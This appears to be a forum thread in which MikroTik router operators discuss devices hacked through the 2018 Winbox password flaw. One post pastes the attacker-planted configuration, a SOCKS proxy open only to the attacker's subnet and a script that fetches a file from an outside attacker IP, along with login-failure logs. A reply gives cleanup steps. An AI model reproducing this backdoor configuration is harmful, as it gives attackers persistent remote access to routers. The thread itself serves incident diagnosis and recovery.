Hi
So we have around 1000 routers in our network and we were hacked around a week ago due to the winbox password flaw
We found the source addresses of some of the attackers and bot nets so we blocked those
A few customers were off line for the last ROS upgrade and unfortunately they got hacked
I have here on the bench a hacked rb951 which I have been trying to access all weekend
Winbox, telnet and ssh blocked
So I decided to spoof the attackers IP's and use the same exploit they did to get the password, no luck so far so I must have missed their address and just got the bots
My concern is this
A few days ago after the attack we went to activate our new BGP only to realise the port was sending out STP, even though the port is not in a bridge it is totally isolated.
Here I have the hacked rb951 and it too is sending out lots of STP from its WAN
I just checked my own router with similar config which I netinstalled just yesterday and there is no STP on the WAN only the bridge as you would expect.
Anybody else witnessed this?
Re: Mikrotik The Hack Continues following Winbox attack STP attack?
i also have this issue, the password is change by someone "hacker"
i check back my last database is have something is add to my mikrotik,
/ip socks
set enabled=yes port=4153
/ip socks access
add action=deny src-address=!95.154.216.128/25
add action=deny src-address=!95.154.216.128/25
add action=deny src-address=!95.154.216.128/25
/system script
add name=script4_ owner=admin policy=ftp,reboot,read,write,policy,test,password,sensitive source=\
"/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http keep-result=no"
and also have this critical login failure
aug/03/2018 18:34:36 system,error,critical login failure for user admin from 95.154.216.151 via winbox
aug/03/2018 18:34:36 system,error,critical login failure for user admin from 95.154.216.151 via winbox
aug/22/2018 05:38:08 system,error,critical login failure for user admin from 95.154.216.151 via winbox
aug/22/2018 05:38:09 system,error,critical login failure for user admin from 95.154.216.151 via winbox
aug/22/2018 19:16:11 system,error,critical login failure for user admin from 95.154.216.151 via winbox
aug/22/2018 19:16:11 system,error,critical login failure for user admin from 95.154.216.151 via winbox
this all red color is not my setting at the mikrotik router, but is auto add to the router.
i also don't know about this ip address ........
i check back my last database is have something is add to my mikrotik,
/ip socks
set enabled=yes port=4153
/ip socks access
add action=deny src-address=!95.154.216.128/25
add action=deny src-address=!95.154.216.128/25
add action=deny src-address=!95.154.216.128/25
/system script
add name=script4_ owner=admin policy=ftp,reboot,read,write,policy,test,password,sensitive source=\
"/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http keep-result=no"
and also have this critical login failure
aug/03/2018 18:34:36 system,error,critical login failure for user admin from 95.154.216.151 via winbox
aug/03/2018 18:34:36 system,error,critical login failure for user admin from 95.154.216.151 via winbox
aug/22/2018 05:38:08 system,error,critical login failure for user admin from 95.154.216.151 via winbox
aug/22/2018 05:38:09 system,error,critical login failure for user admin from 95.154.216.151 via winbox
aug/22/2018 19:16:11 system,error,critical login failure for user admin from 95.154.216.151 via winbox
aug/22/2018 19:16:11 system,error,critical login failure for user admin from 95.154.216.151 via winbox
this all red color is not my setting at the mikrotik router, but is auto add to the router.
i also don't know about this ip address ........
Re: Mikrotik The Hack Continues following Winbox attack STP attack?
You have two choices
1) Netinstall with v6.43 and reconfigure it, this is the safe choice
2) Remove Scheduler rule, Scripts, SOCKS config and fix the firewall rules that the attackers have changed. CHANGE YOUR PASSWORD also.
1) Netinstall with v6.43 and reconfigure it, this is the safe choice
2) Remove Scheduler rule, Scripts, SOCKS config and fix the firewall rules that the attackers have changed. CHANGE YOUR PASSWORD also.
Who is online
Users browsing this forum: Amaan, shahzaddj1 and 165 guests